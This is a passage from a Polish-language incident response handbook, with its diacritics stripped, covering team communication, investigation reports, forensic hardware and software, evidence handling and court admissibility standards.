Gromadzenie i dokumentowanie materiau dowodowego zwizanego z incydentem.
Korzystanie z dodatkowej pomocy, gdy jest to konieczne.

Chronienie praw prywatnoci ustalonych przez prawo i zasady przyjte w firmie.
Wsppraca z organami porzdku publicznego i prawnymi.
Utrzymywanie incydentu w tajemnicy, aby chroni organizacj przed niepotrzebnym
zainteresowaniem.
Zapewnianie zezna ekspertw.
Przedstawianie dyrekcji zalece majcych pene oparcie w faktach.
Procedury komunikacji
Podczas incydentu rwnoczenie pracuje kilka zespow podstawowy zesp ledczy, zesp
pomocniczy, prawnicy oraz administratorzy systemw, ktrzy nie tylko wykonuj polecenia
czonkw zespou podstawowego, ale dodatkowo czsto sami wykonuj istotne czynnoci. Dobra
komunikacja to podstawa, wic bardzo wane jest zaplanowanie jej, zanim dojdzie do incydentu.
W tym punkcie opisujemy komunikacj taktyczn i doran.
Uwaga Temat komunikacji i dokumentacji naley omwi z radc prawnym organizacji. W niektrych
przypadkach prawnicy mog uczestniczy w komunikacji, aby upewni si, e informacje mog
by ujawniane. Decyzja w tym zakresie zaley od natury ledztwa i tego, czy organizacja robi co,
co podlega nadzorowi. Tu przyjmujemy zaoenie, e zasignito rady w tej kwestii i wszystko
odbywa si zgodnie z prawem.
Komunikacja wewntrzna
W wielu ostatnich ledztwach mielimy do czynienia z sytuacj, w ktrej haker od razu atakowa
serwery e-mail. Na kilku serwerach znalelimy dowody, e hakerzy zdobyli zawarto skrzynek
pocztowych osb na stanowiskach dyrektorskich i starszych administratorw systemw
informatycznych. Krtko potem hakerzy wrcili i przeszukiwali cay serwer pocztowy w celu
znalezienia acuchw wiadczcych o prowadzonym ledztwie. Niestety ryzyko, e hakerzy
bd patrze, jak prbujesz ich wytropi, nie jest tylko teoretyczne. Dlatego przygotowujc si
do zareagowania na incydent, pamitaj o poniszych zasadach bezpiecznej komunikacji.
Szyfruj wiadomoci e-mail zanim dojdzie do incydentu, sprokuruj certyfikaty S/MIME
dla czonkw podstawowego i pomocniczego zespou RI. Zasignij informacji w dziale IT
organizacji, poniewa moesz z niego otrzyma certyfikaty dla pracownikw bez ponoszenia
bezporednich kosztw. Ewentualnie mona skorzysta z alternatywnych rozwiza, takich
jak PGP, chocia integracja z popularnymi klientami poczty jest raczej saba.
Prawidowo oznaczaj wszystkie dokumenty i komunikaty okrelenia w rodzaju
Poufne, dla uprawnionych, Praca penomocnika, Przygotowane pod okiem radcy
s bardzo dobre i mog by nawet wymagane. Najlepiej spyta prawnika, jakie oznaczenia,
jeli w ogle jakie, s najodpowiedniejsze.
Monitoruj zebrania konferencyjne ustaw system do obsugi konferencji tak, aby

monitorowa, kto bra udzia w spotkaniach lub kto oglda prezentacje. Miej oko na list
uczestnikw i wyczaj niezweryfikowanych.
W ledztwie posuguj si numerami spraw lub nazwami projektw nazwy projektw
pozwalaj unikn ujawniania szczegw na konferencjach, spotkaniach i fakturach dla
zewntrznych usugodawcw. W ten sposb zmniejsza si ryzyko przechwycenia informacji
przez hakerw, poniewa im mniej osb zna szczegy, tym lepiej. Staraj si wszystko traktowa tak,
jakby to by zwyky projekt. Im mniej osb wie o potencjalnej luce w zabezpieczeniach, tym lepiej.
Uwaga Zwracaj uwag na to, jakiego typu informacje s wysyane do serwera poczty z automatycznych
procesw. Jeli system monitorowania incydentw lub po prostu system poczty gosowej telefonu
biurkowego wysya do Ciebie potencjalnie tajne informacje, powiniene ograniczy takie wiadomoci
do prostego powiadomienia. Moe jest to troch mniej wygodne, ale moe uchroni Ci przed
ujawnieniem danych ledczych.
W INTERNECIE
rda darmowych certyfikatw S/MIME
www.instantssl.com/ssl-certificate-products/free-email-certificate.html
www.startssl.com
rda patnych certyfikatw S/MIME
www.symantec.com/verisign/digital-id
www.globalsign.com/authentication-secure-email
Komunikacja z usugodawcami zewntrznymi

Jeli organizacja ma szczcie, skutki wamania bd na tyle mae, e nie bdzie trzeba nikogo
powiadamia, ani korzysta z pomocy z zewntrz. Poniewa jednak biurokracja i regulacje prawne
staj si coraz bardziej zaostrzone, nie mwic ju o zapisach w umowach zobowizujcych
do ujawniania incydentw, istnieje due ryzyko, e organizacja bdzie musiaa okreli sposb
komunikowania si z podmiotami zewntrznymi. Planowanie potencjalnego ujawnienia informacji
to proces, w ktrym powinni uczestniczy radcy prawni, inspektorzy nadzoru oraz dyrektorzy
najwyszego szczebla.
W tym zakresie moemy tylko poradzi, eby zrobi to dobrze. Korzystaj z zaufanych kanaw,
takich jak dzia PR czy biuro prawnika. Po publicznym ujawnieniu zdarzenia moesz straci kontrol
nad ledztwem. Inne podmioty mog wykorzysta umowy, aby da podjcia pewnych czynnoci
lub wszczcia ledztwa w celu ochrony wasnych interesw, ktre przedkadaj nad interesy Twojej
organizacji. Oto kilka pyta, na ktre warto sobie odpowiedzie przy podejmowaniu decyzji o tym,
jakie informacje ujawni i kiedy to zrobi.
Kiedy musisz zgosi incydent? Od razu po wykryciu czy dopiero po potwierdzeniu?
W jaki sposb ma by przekazywane powiadomienie do jednostki zewntrznej?
Jakie zapisy w umowie zapewniaj Ci poufno?
Jeli incydent musi zosta publicznie ujawniony, kto decyduje o treci i czasie wydania
komunikatu? W jaki sposb ma si to odby?
Jakie kary i grzywny dla organizacji s przewidziane za spnione ujawnienie incydentu?
Czy czas ujawnienia ma na to wpyw?
Jakie utrudnienia w ledztwie spowoduje ujawnienie incydentu? Czy jaki podmiot
zewntrzny musi bra udzia w ledztwie?
W jaki sposb ujawnienie wpynie na czynnoci naprawcze?
Informowanie o wynikach ledztwa

Jako e pracujemy w firmie konsultacyjnej, tworzona przez nas dokumentacja jest jednym
z produktw, ktre dostarczamy klientom. Uwaamy, e kady zesp powinien traktowa swoj
prac jak wiadczenie usug i mie zdefiniowane standardowe produkty, ktre dostarczy klientowi.
Najwaniejsze z nich w przypadku zespou RI to raporty z przeprowadzonego ledztwa. Mog to by
zarwno jednostronicowe dokumenty opisujce biecy stan ledztwa, jak i szczegowe ekspertyzy
ledcze o dugoci 30 stron. Zesp RI powinien zdefiniowa standardowe rodzaje dokumentw i okreli
docelowy czas ich skadania. Ponadto dla zapewnienia spjnoci naley opracowa szablony i instrukcje
dla kadego typu dokumentw. W poniszej tabeli znajduje si lista przykadowych definicji.
Nazwa Przeznaczenie Sposb dostarczania

Raport o stanie Informacja dla akcjonariuszy Okresowy: dziennie lub co inny
sprawy o postpie jednej sprawy ustalony czas
Raport z czynnoci Dokumentacja odkry Szkic: w cigu jednego dnia roboczego
przeprowadzonych na dokonanych w toku wstpnych Ostateczna wersja: w cigu dwch
dziaajcym systemie czynnoci wykonanych na ywo dni roboczych
w jednym systemie
Ekspertyza ledcza Szczegowa dokumentacja Szkic: w cigu czterech dni roboczych
analizy ledczej jednego Wersja ostateczna: w cigu szeciu
elementu lub dowodu dni roboczych
Raport z analizy Dokumentacja odkry Szkic: w cigu trzech dni roboczych
szkodliwego dokonanych podczas analizy Wersja ostateczna: w cigu piciu
oprogramowania szkodliwego oprogramowania dni roboczych
Raport ze ledztwa Zbir wszystkich raportw Szkic: w cigu piciu dni roboczych
w sprawie wtargnicia i odkry zwizanych z jednym od zakoczenia ledztwa
do systemu incydentem w postaci Wersja ostateczna: w cigu omiu
podsumowania dla dyrekcji dni roboczych od zakoczenia
ledztwa
Zasoby dla zespou RI

Zesp RI, tak jak kady inny, do pracy potrzebuje zasobw. Oprcz standardowych wymaga
organizacyjnych, takich jak szkolenia i dokumentacja, zesp RI ma pewne specyficzne wymagania
sprztowe i programowe. Warto przeczyta ten punkt, nawet jeli ju ustalie, jakie zasoby s
potrzebne Twoim ludziom, aby zobaczy, jakie jest nasze zdanie na ten temat.
Szkolenie zespou RI
Nie da si przeceni wanoci dobrego przeszkolenia pracownikw. Jest wiele praktycznych
kursw dla czonkw zespow RI. Wikszo z nich jest warta swojej ceny. Jednak najlepsze
wyksztacenie daj programy niektrych uczelni wyszych. Aktualnie najlepsze programy maj
nastpujce jednostki:
Carnegie Mellon Software Engineering Institute (www.sei.cmu.edu),
Purdue University College of Technology (tech.purdue.edu),
Johns Hopkins University Information Security Institute (isi.jhu.edu).
Aktualnie liderem w brany szkole z zakresu informatyki ledczej jest instytut SANS
(ang. SysAdmin, Audit, Networking, and Security Institute). Oferuje duo wysokiej jakoci kursw.
W INTERNECIE
Instytut SANS www.sans.org
Sprzt dla zespou RI

Nowoczesne rozwizania sprztowe znacznie uatwiaj specjalistom RI prowadzenie dochodze
i wykonywanie innych czynnoci przy uyciu komputerw dostpnych na zwykym rynku. Do pracy
powinny wystarczy wyszej klasy maszyny najlepszych producentw sprztu komputerowego
w poczeniu ze specjalnymi urzdzeniami dla ledczych. W naszej firmie oglnie wyrniamy
dwa miejsca prowadzenia analiz ledczych: w terenie i w siedzibie. Poniej omawiamy rozwizania,
ktre sprawdziy si u nas w obu tych przypadkach.
Ochrona danych
Podczas incydentu przetwarza si i analizuje poufne dane, wic niezalenie od tego, czy pracuje si
w terenie, we wasnym biurze, czy w trasie, naley poczyni odpowiednie kroki, aby uniemoliwi
nieuprawniony dostp do tych informacji. Najlepszym sposobem jest szyfrowanie danych.
Poufne dane mona przechowywa na dwa sposoby.
Trwae wewntrzne noniki danych zaliczaj si do nich dyski twarde i noniki na stae
zamontowane w komputerze. Najczciej wykorzystywanym rozwizaniem jest programowe
szyfrowanie caego dysku (ang. full disk encryption FDE) za pomoc takich technologii
jak Truecrypt czy McAfee Endpoint Encryption. Inn moliwoci, cho troch drosz,
jest sprztowe szyfrowanie FDE, ktre czasami nazywa si SED (ang. Self-Encrypting Drive).
Zewntrzne noniki danych s to z reguy urzdzenia przenone, takie jak pendrivey,

napdy USB i zwyke dyski twarde w zewntrznych obudowach. W kategorii tej mona
wymieni wiele rozwiza zarwno sprztowych, jak i programowych. Typowym rozwizaniem
programowym jest Truecrypt. Natomiast w sprzcie mona znale rozwizania USB i SATA.
W INTERNECIE
www.truecrypt.org
www.apricorn.com/products/hardware-encrypted-drives.html
www.mcafee.com/us/products/endpoint-encryption.aspx
Ostrzeenie Zanim podejmiesz decyzj dotyczc szyfrowania nonika danych, dobrze oszacuj poziom ryzyka,
na jakie jeste naraony. Do grupy wysokiego ryzyka zaliczaj si laptopy wykorzystywane
w niebezpiecznych rodowiskach i przesyane noniki przenone. Natomiast komputery stacjonarne
uywane w chronionym rodowisku laboratoryjnym nale do grupy niskiego ryzyka. Ponadto
pamitaj, e nawet jeli nie skopiujesz poufnych danych na swj komputer, to i tak mog si
one znale na twardym dysku. Jeli np. skorzystasz z informacji przy uyciu udziau sieciowego
albo zewntrznego napdu USB, system operacyjny lub jaka aplikacja moe utworzy na dysku
twardym pliki tymczasowe. Jeeli szukasz powodw, dla ktrych mona by byo zrezygnowa
z szyfrowania, prawdopodobnie potrzebujesz tego rodka zabezpieczajcego. Pamitaj, e
wikszo procesorw zawiera specjalne instrukcje, ktre znacznie przyspieszaj szyfrowanie,
dziki czemu stosowanie tej techniki nie jest ju tak kopotliwe jak kiedy.
ledztwo w terenie
Wiele incydentw wymaga przeprowadzenia ledztwa w siedzibie klienta. W takich przypadkach
naszym podstawowym narzdziem jest dobrze wyposaony laptop renomowanej firmy.
Wybieramy komputery dobrze wsppracujce ze specjalistycznym sprztem ledczym, ktrego
opis zamiecilimy w nastpnym podrozdziale. Budujc system do pracy, bierzemy pod uwag
kilka wanych czynnikw.
Pami zazwyczaj montujemy maksymaln lub prawie maksymaln moliw ilo pamici.
CPU wybieramy najlepszy model dostpny na danej platformie.
Magistrale wejcia i wyjcia eSATA, Firewire 800, USB 3.0 i inne szybkie interfejsy
do czenia komputera z zewntrznymi dyskami twardymi.
Rozmiar i rozdzielczo ekranu wybieramy due ekrany o wysokiej rozdzielczoci.
Trudno pracowa z monitorem o przektnej 14 cali.
Przenono ciar i wymiary s wane podczas podry.
Serwis gwarancyjny jeli sprzt ulegnie awarii, producent powinien natychmiast
wysya zamiennik albo specjalist od napraw.
Wewntrzna pami masowa powinna by dua i szybka. Jeli dodatkowo uda si
znale napd, ktry sam si szyfruje i jest obsugiwany przez BIOS Twojej pyty gwnej,
warto troch za niego dopaci.
ledztwo we wasnej siedzibie

Czasami niektre ekspertyzy wykonujemy we wasnej siedzibie. Nasi klienci lub inni pracownicy
naszej firmy mog przysya dyski twarde, obrazy dyskw twardych i inne potrzebne informacje.
Po obu stronach mamy specjalne laboratoria, w ktrych znajduj si systemy z blokadami zapisu
gotowe do tworzenia roboczych kopii materiau dowodowego. Oryginalny materia jest
przechowywany w strzeonym miejscu zgodnie ze spisanymi zasadami przechowywania dowodw.
Nasi analitycy wykonuj ekspertyzy tego materiau w rodowiskach wirtualnych. Posiadamy
gotowe standardowe szablony rodowisk badawczych zawierajce typowe narzdzia ledcze, dziki
czemu moemy bez trudu utworzy now czyst maszyn wirtualn dla kadego pracownika i dla
kadej sprawy. Po zakoczeniu analizy maszyna wirtualna zostaje zniszczona. Ten model pracy
pozwala na rozpoczynanie kadej analizy od znanego stanu oraz pomaga unikn baaganu
i blokowania zasobw.
Wsplne zasoby ledcze

W obu opisanych rodowiskach operacyjnych zesp RI lub grupa analitykw obok wasnych stacji
roboczych korzysta take ze wsplnych zasobw. Przede wszystkim potrzebny jest nam specjalny
sprzt do prowadzenia ledztw. Zespoy powinny mie w zanadrzu kilka kompletnych zestaww
blokad zapisu. Istniej wersje umoliwiajce badanie i duplikowanie wielu interfejsw, wcznie
z PATA, SATA, SCSI oraz SAS. Posiadamy pewn pul takiego sprztu w naszej siedzibie
i wydajemy go odpowiednim osobom, jeli trzeba. W rozdziale 8. szczegowo opisujemy
nastpujce kategorie specjalistycznego sprztu ledczego:
samodzielne systemy do duplikowania dyskw i wykonywania obrazw dyskw;
blokady zapisu dla mediw korzystajcych z wszystkich typw interfejsw, jakich mona
si spodziewa;
systemy do badania urzdze mobilnych;
rozmaite przewody i przejciwki.
Oprcz specjalistycznego sprztu przechowujemy spor ilo nastpujcych urzdze:
due zewntrzne dyski twarde do przechowywania materiau dowodowego i roboczych
kopii danych;
kamery cyfrowe do dokumentowania dowodw;
czyste pyty CD i DVD;
przeczniki i kable sieciowe;
listwy zasilajce i kable;
kable do czenia z rnymi portami komputera Firewire, eSATA, USB;
narzdzia do naprawy komputerw, takie jak rubokrty, klucze typu Torx, otwieracze
serwisowe i inne narzdzia do otwierania obudw.
Platformy do monitorowania sieci

Do monitorowania sieci wykorzystujemy dwie platformy. Doranie posugujemy si laptopami
z wyposaeniem podobnym do uywanego w siedzibie. Gwn zalet tego rozwizania jest jego
przenono i wbudowany zasilacz UPS. Jednak w wikszoci instalacji uywamy szaf typu rack
o rozmiarze 1U z wysokiej klasy procesorem, du iloci pamici (aktualnie 12 16 GB) i pamici
masow o szybkoci i pojemnoci wystarczajcej do odbierania danych przez w miar dugi czas przy
80% wykorzystaniu moliwoci poczenia, ktre monitorujemy. Platformy te s zazwyczaj wyposaone
w wieloportowe karty sieciowe. Jeden port jest zarezerwowany dla interfejsu zarzdzania, a pozostae
s wykorzystywane do monitorowania. W niektrych ledztwach wykorzystujemy te interfejsy
do monitorowania czy optycznych i miedzianych o duej przepustowoci.
Monitorowanie czy, przez ktre przepywa duy ruch, jest duym wyzwaniem dla wikszoci
platform monitorujcych, chyba e opracuje si wasne sterowniki i metody przechowywania danych,
chocia w wikszoci rodowisk wystarcza minimalna instalacja sytemu FreeBSD lub Linux. Kiedy
trzeba byo bawi si z atkami jdra i dostraja system, konfigurowa system IDS, instalowa konsol
(i mnstwo bibliotek potrzebnych do prowadzenia analiz) oraz zarzdza podpisami. Pojawiy si
jednak projekty, do trzech podalimy poniej odnoniki, ktre bardzo uatwiaj wdraanie platform
monitorujcych. Bardziej szczegowo monitorowaniem sieci zajmujemy si w rozdziale 9.
W INTERNECIE
Security Onion securityonion.blogspot.com
Network Security Toolkit networksecuritytoolkit.org
Easy-IDS skynet-solutions.net
Oprogramowanie dla zespou RI

W tym podpunkcie opisujemy oglne kategorie i funkcjonalno podstawowego oprogramowania
potrzebnego zespoom RI. Wicej szczegowych informacji na temat posugiwania si konkretnymi
narzdziami zamiecilimy w rozdziaach od 11. do 16.
Jakiego oprogramowania uywamy

Ludzie w wikszoci organizacji, dla ktrych pracujemy, pytaj nas o to, jakiego oprogramowania
uywamy i dlaczego. Najczciej ciekawi s, czy korzystamy z narzdzi o otwartym kodzie rdowym
lub komercyjnych. W rzeczywistoci uywamy darmowych i patnych programw zarwno o otwartym,
jak i zamknitym kodzie rdowym. Zamiast przedstawia konkretne programy, wolimy opisa,
jakimi kryteriami kierujemy si przy ich wyborze.
Wybr konkretnego rozwizania czsto sprowadza si do czasu jeli wszystkie inne parametry
s takie same, wybieramy to narzdzie, ktre dziaa najszybciej. Dodatkowo bierzemy pod uwag
funkcje przygotowawcze, wykonawcze i raportowe. Czas jest dla nas najwaniejszy z dwch
powodw poniewa szybsze narzdzie umoliwia szybsze wykrycie przestpstw (co pozwala
zminimalizowa szkody), a nasi kliencie pac nam stawk godzinow. Czas jest prawdopodobnie
te najwaniejszym czynnikiem w Twojej organizacji, cho pewnie w gr wchodz te inne kwestie,
takie jak choby budet.
Solidne oprogramowanie ledcze i dopuszczalno dowodu
Czasami mona natkn si na stwierdzenia, e jakie narzdzie musi by solidne pod ktem
prowadzenia ledztw oraz e jego status pod tym wzgldem decyduje o dopuszczalnoci
zdobytych za jego pomoc dowodw w sdzie. Nie istnieje jednak adna definicja okrelajca,
jakie warunki taki program powinien spenia i zazwyczaj to sdzia decyduje, czy uwzgldni
dany dowd w postpowaniu sdowym, czy nie. Zalecamy wic zastanowienie si nad czynnikami
scharakteryzowanymi w opisanych poniej rozprawach sdowych.
W 1923 roku sd federalny ustanowi zestaw standardw zwanych testem Fryea. Nie tak
dawno temu, w 1993 roku, Sd Najwyszy Stanw Zjednoczonych wyda opini, w ktrej
sformuowa kryteria dopuszczalnoci dowodw naukowych w sprawach federalnych.
(Naley wiedzie, e poszczeglne stany mog przyj standardy Fryea, kryteria ze sprawy
Dow lub wasne). Sprawa Daubert v. Merrell Dow Pharmaceuticals, 509 U.S. 579 (1993)
sprawia, e zamiast oglnej akceptacji zaczto wymaga sprawdzania wiarygodnoci
i relewantnoci dowodw. Konkluzje sdziw na temat dopuszczenia zezna ekspertw
przyczyniy si do sformuowania szeregu kryteriw, ktrymi mona posugiwa si podczas
weryfikowania wiarygodnoci zezna. Oto cztery kryteria brane pod uwag przy okrelaniu
wiarygodnoci dowodw pozyskanych za pomoc metod naukowych.
Czy teoria naukowa lub technika zostay empirycznie zbadane?
Czy teoria naukowa lub technika przeszy przez proces recenzji rodowiska naukowego
i byy opisane w literaturze fachowej?
Czy znany jest margines bdu? Czy istniej standardy okrelajce sposb
przeprowadzania bada t technik?
Czy metoda cieszy si akceptacj odpowiedniego rodowiska naukowego?
W innej sprawie, Kumho Tire Co et al. v. Carmichael et al. (1993), sd doszed do wniosku,
e kryteria przyjte w standardzie Daubert s niewystarczajce w przypadkach, w ktrych
wykorzystywane s metody niesformuowane w ramach naukowych. Metody te nie byy mniej
wartociowe, ale prawo nie byo odpowiednio przygotowane, aby uwzgldnia tego typu ekspertyzy.
W zwizku z tym sd opracowa dodatkowe kryteria.
Czy technika zostaa opracowana do innych celw ni rozstrzyganie sporw sdowych?
Czy ekspert wystarczajco dobrze wyjania wane dane empiryczne?
Czy technika bazuje na wysokiej jakoci danych?
Czy da si sprawdzi spjno procesw i metod stosowanych w danej technice?
Czy da si sprawdzi spjno procesw i metod stosowanych w danej technice
w odniesieniu do biecej sprawy?
Czy technika jest opisana w literaturze fachowej?
Czy biegy posiada odpowiednie kwalifikacje?
W czym dana technika rni si od innych podobnych metod?
Lubimy te mie kilka moliwoci do wyboru, poniewa zdarza si, e w pewnym rodowisku
okrelone narzdzie nie dziaa. Dlatego zazwyczaj mamy przynajmniej dwa narzdzia o zblionej
funkcjonalnoci. Utrzymujemy list narzdzi, ktre s aktualnie dopuszczone do uytku przez
konsultanta. Kady program przed trafieniem na t list jest testowany. Przeprowadzenie wasnych
testw jest dobrym pomysem nawet wtedy, gdy kto inny ju sprawdzi dane narzdzie.
Rodzaje oprogramowania uywanego przez specjalistw RI

Programy uywane przez nas podczas ledztw mona podzieli na osiem oglnych kategorii.
Powinno si inwentaryzowa wszystkie narzdzia do okrelonych zastosowa oraz szuka
dodatkowych narzdzi na podstawie kryteriw, ktrych opis znajduje si poniej.
Dyski rozruchowe do tej kategorii zaliczaj si noniki (CD i USB), z ktrych mona
bezporednio uruchomi narzdzia ledcze. Przykadowymi projektami zapewniajcymi
tak moliwo s Kali Linux, CAINE i Helix.
W INTERNECIE
Kali Linux www.kali.org/
CAINE www.caine-live.net
Helix www.e-fense.com
Systemy operacyjne czonkowie zespou RI powinni zna wszystkie systemy operacyjne

uywane w organizacji. Najlepiej mie nonik instalacyjny kadego systemu i utworzy
maszyny wirtualne zawierajce obrazy, do ktrych zawsze mona wrci. Przydaj si one
do nauki, a take do przeprowadzania testw lub rnych eksperymentw umoliwiajcych
stworzenie procedur albo potwierdzenie ich dokadnoci.
Narzdzia do tworzenia obrazw dyskw warto utrzymywa list narzdzi do tworzenia
obrazw zatwierdzonych przez zesp. Aby zdecydowa, jakie programy powinny si znale
na tej licie, a jakich by na niej nie powinno, najlepiej zajrze na stron Computer Forensic
Tool Testing NIST pod adresem www.cftt.nist.gov. Szczegowy opis technik tworzenia
obrazw dyskw znajduje si w rozdziale 8. Zadbaj o to, by informatycy i inni pracujcy
na pierwszej linii znali narzdzia i procedury.
Robienie zrzutw i analiza pamici oprcz narzdzi do tworzenia obrazw dyskw
potrzebne s niezawodne i sprawdzone narzdzia do wykonywania zrzutw zawartoci
pamici. Naley mie na uwadze, e w rodowisku wystpuj rne systemy operacyjne
i powinno si przetestowa rozwizania dla kadego z nich. Analiza pamici jest tematem
rozdziaw od 12. do 14.
Pobieranie danych na ywo i ich analiza naley opracowa i przetestowa zestaw
narzdzi do gromadzenia danych na ywo dla kadego systemu operacyjnego uywanego
w organizacji. Proces reakcji na ywo i preferowane przez nas narzdzia opisalimy
w rozdziale 7.
Tworzenie i wyszukiwanie wskanikw zagroenia podczas ledztwa potrzebne s te

narzdzia do tworzenia i wyszukiwania wskanikw zagroenia. Wicej informacji na te
tematy znajduje si w rozdziaach 2. i 5.
Pakiety oprogramowania ledczego pakiety oprogramowania ledczego zawieraj cae
zestawy funkcji. Najczciej ich gwnym zastosowaniem jest analizowanie obrazw
dyskw, wic zapewniaj moliwo interpretowania formatw danych i umoliwiaj
wyszukiwanie informacji. W ksice tej nie opisujemy adnego takiego pakietu, a zamiast
tego przedstawiamy podstawowe wiadomoci i metody, ktre trzeba zna, aby przeprowadzi
skuteczn ekspertyz.
Narzdzia do analizowania zawartoci dziennikw w wikszoci ledztw konieczne jest
analizowanie wielkich iloci plikw dziennika. Typowy format dziennika to zwyky tekst
zawierajcy wartoci rozdzielane jakim znakiem. W takich przypadkach analiz wykonujemy
za pomoc jakiegokolwiek narzdzia umoliwiajcego prac na zwykym tekcie. Czasami
jednak spotyka si te niestandardowe formaty i wwczas potrzebne s specjalne narzdzia
do odczytania i przekonwertowania danych. Dzienniki czsto maj gigantyczne rozmiary
kilka razy mielimy do czynienia z dziennikami o rozmiarze wielu terabajtw. Jeli
spodziewasz si czego podobnego w swojej organizacji, znajd specjalne narzdzia, ktre
poradz sobie z takimi ilociami danych.
Dokumentacja
W tym podpunkcie sowo dokumentacja odnosi si do zasad, procedur, zarzdzania wiedz lub
przepywem pracy w zespole RI. Obszary, ktre tu opisujemy, s naszym zdaniem najwaniejsze,
cho istniej inne wane tematy. Jednak zesp RI musi sam zdecydowa, co najbardziej zasuguje
na uwzgldnienie w dokumentacji.
Sposb postpowania z materiaem dowodowym

Materia dowodowy to rdo informacji zdobytych w toku ledztwa, wic naley z nim
odpowiednio postpowa. Konieczne jest zwracanie uwagi na szczegy i cise trzymanie si
procedur. Jeeli kto zakwestionuje jako materiau dowodowego, dane zdobyte w ledztwie mog
straci warto. Aby do tego nie dopuci, zalecamy przyjcie odpowiednich zasad i procedur
postpowania z materiaem dowodowym. Zazwyczaj zaliczaj si do nich wytyczne dotyczce
sposobw gromadzenia dowodw, sporzdzania dokumentacji, przechowywania materiaw oraz
ich transportowania.
Powinno si przynajmniej opracowa procedury zapewniajce integralno danych oraz zastosowa
techniki uwierzytelniania i weryfikacji. Integralno mona osign poprzez co, co nazywamy
pozytywn kontrol. Polega ona na tym, e dowody musz cay czas znajdowa si pod bezporedni
opiek uprawnionego personelu lub zabezpieczone w kontrolowanym rodowisku albo kontenerze,
np. sejfie. Do transportu naley wybiera przewonika umoliwiajcego ledzenie drogi paczki oraz
tak zapakowa materiay, aby nie dao si ukry faktu zajrzenia do nich oraz by byy chronione
przed ywioami. Potwierdzenie autentycznoci mona uzyska przez prowadzenie odpowiedniej
dokumentacji zawierajcej m.in. metk dowodu i informacje o pochodzeniu produktu.
Przykadow metk dowodu przedstawilimy w zamieszczonym na stronie wydawnictwa Helion

dodatku B. Weryfikacj wykonuje si przy wykorzystaniu kryptograficznej sumy kontrolnej, np.
MD5, obliczanej po zebraniu materiau dowodowego, ktr mona sprawdzi w dowolnym
momencie. Weryfikacja stanowi dowd na to, e materiay nie zostay zmienione od momentu ich
pozyskania. Wicej informacji o reguach postpowania z dowodami mona znale w wytycznych
Departamentu Sprawiedliwoci Stanw Zjednoczonych na podanych poniej stronach.
W INTERNECIE
www.justice.gov/criminal/cybercrime/docs/ssmanual2009.pdf
http://www.law.cornell.edu/rules/fre
Wewntrzna skadnica wiedzy

Jako e zesp RI prowadzi ledztwa i wsppracuje z rnymi dziaami organizacji, gromadzi
wiedz, ktra powinna by gdzie zapisywana. Niektre informacje mog dotyczy tylko jednego
incydentu i mog by przechowywane w systemie biletowym albo systemie zarzdzania sprawami.
Inne informacje mog by zwizane z ca organizacj i powinny by przechowywane w skadnicy
informacji obsugiwanej przez zesp RI. Skadnica ta powinna by logicznie zorganizowana
i umoliwia wyszukiwanie informacji, aby pracownicy mogli szybko znajdowa potrzebne im dane.
PRZYGOTOWYWANIE INFRASTRUKTURY
DO REAKCJI NA INCYDENT
Mamy na koncie setki przeprowadzonych procesw reakcji na incydenty, od wama po oszustwa.
Cho niektre dowody w sprawach rni si midzy sob, to jednak rda przydatnych tropw
i danych pozostaj w miar niezmienne, podobnie jak metody zdobywania i analizowania tych
danych. Niezalenie od rodzaju ledztwa, zesp RI powinien mie moliwo zdobywania danych
i wyszukiwania materiaw w caym przedsibiorstwie z tak atwoci, jak si to robi na jednym
komputerze. Nie jest wic zaskoczeniem, e odpowiednie rodki bezpieczestwa informacji
i procedury obsugi zmian uatwiaj szybk reakcj i proces naprawy.
Przez lata dowiadcze dostrzeglimy kilka obszarw, z ktrymi organizacje czsto maj problemy.
Wyrniamy dwie szerokie kategorie tych problemw; s to urzdzenia komputerowe (np. serwery,
komputery biurkowe i laptopy) oraz sie. Najpierw przyjrzymy si komputerom, a potem przejdziemy
do zagadnie zwizanych z konfiguracj sieci. W kadej z tych dwch kategorii opisujemy cztery
najwaniejsze kwestie, z ktrymi boryka si wikszo organizacji. Oto one.
Konfiguracja urzdze komputerowych:
zarzdzanie rodkami,
inwentaryzacja,
oprzyrzdowanie,
dodatkowe czynnoci pozwalajce na podniesienie poziomu bezpieczestwa.
Konfiguracja sieci:
segmentacja sieci i kontrola dostpu,
dokumentacja,
instrumentacja,
usugi sieciowe.
Konfiguracja urzdze komputerowych

Urzdzenia komputerowe, takie jak serwery, komputery biurkowe i laptopy, zawieraj wikszo
dowodw potrzebnych w ledztwie, wic sposb ich konfiguracji ma bardzo duy wpyw na wyniki
dochodzenia. Bez odpowiedniego materiau dowodowego nie mona odpowiedzie na podstawowe
pytania, co si w ogle stao. Dlatego kada organizacja powinna tak skonfigurowa wszystkie systemy,
aby dao si przy ich uyciu jak najefektywniej prowadzi czynnoci ledcze. Wiele organizacji
skupia si tylko na tych systemach, ktre uwaa za wane, ale to implikuje przekonanie, e atak
hakera bdzie si dao wykry w krytycznym systemie. Z naszego dowiadczenia wiemy jednak,
e hakerzy do swoich operacji wykorzystuj niepowizane ze sob systemy i pozostawiaj setki
ladw w mniej wanych systemach. Ponadto hakerzy mog wykorzystywa poprawne dane
powiadczajce w sposb niebudzcy jakichkolwiek podejrze. Jeli takie lady nie zostan
zauwaone i zachowane, wiele pyta na temat incydentu pozostanie bez odpowiedzi. Aby mie
pewno, e zadbano o wszystkie aspekty konfiguracji systemu w organizacji, naley:
1. Wiedzie, co si ma raczej trudno chroni systemy, o ktrych istnieniu si nie wie.
Najlepiej wdroy w przedsibiorstwie system zarzdzania rodkami i dodatkowo
przeprowadzi spis skadnikw uywanych w produkcji, zarwno systemw, jak i aplikacji.
W ten sposb mona wykry informacje o rodowiskach wymagajcych dodatkowego
planowania.
2. Ulepsza i poprawia zasoby po sprawdzeniu, jakie systemy i technologie s w uyciu,
naley tak je skonfigurowa, aby jak najbardziej uatwiay prowadzenie ledztw. Specjalici
powinni zaj si ustawieniami dziennikw, programw antywirusowych i HIPS, wdroeniem
narzdzi ledczych oraz wprowadzi wiele innych udoskonale. Jednoczenie naley mie
na uwadze zasady ochrony prywatnoci i przepisy prawa, aby nie zrobi czego, co jest
niedozwolone.
Uwaga Nie opisujemy szczegowo metod doskonalenia zabezpiecze hostw i innych tematw
dotyczcych zwikszania poziomu bezpieczestwa. Jest wiele wartociowych materiaw, np.
wyczerpujce informacje mona znale w wytycznych Security Technical Implementation Guides
(STIGs) agencji Defense Information Systems Agency (DISA) dostpnych na stronie iase.disa.mil/stigs.
My koncentrujemy si na obszarach o najwikszym znaczeniu dla ledztwa.
Zarzdzanie rodkami
